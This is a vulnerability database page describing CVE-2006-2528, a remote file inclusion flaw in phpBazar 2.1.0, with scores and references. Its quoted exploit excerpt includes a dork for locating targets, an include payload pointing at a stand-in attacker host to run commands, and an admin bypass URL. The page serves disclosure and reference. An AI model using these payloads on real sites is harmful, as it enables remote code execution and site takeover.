Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
6.4
CVSSv2

CVE-2006-2528

Published: 22/05/2006 Updated: 20/07/2017
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

PHP remote file inclusion vulnerability in classified_right.php in phpBazar 2.1.0 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the language_dir parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

smartisoft phpbazar 2.1.0

Exploits

Exploit DB: phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass
Title: phpBazar <= 210 Multiple vulnerabilites URL: wwwsmartisoftcom/ Dork: inurl:classifiedphp phpbazar Exploits: -remote file inclusion: /classified_rightphp?language_dir=yourhost/cmdgif?cmd=ls -access to admin login and password: /admin/adminphp?action=edit_member&value=1 # milw0rmcom [2006-05-19] ...

References

NVD-CWE-Otherhttp://www.securityfocus.com/archive/1/434558http://www.securityfocus.com/bid/18052http://secunia.com/advisories/20198http://www.osvdb.org/25700http://securityreason.com/securityalert/933https://exchange.xforce.ibmcloud.com/vulnerabilities/26618https://nvd.nist.govhttps://www.exploit-db.com/exploits/1804/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
authentication bypassCVE-2024-30043cameraCVE-2023-40404CVE-2024-2793client sideCVE-2024-4469CVE-2024-3565CVE-2024-29825
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook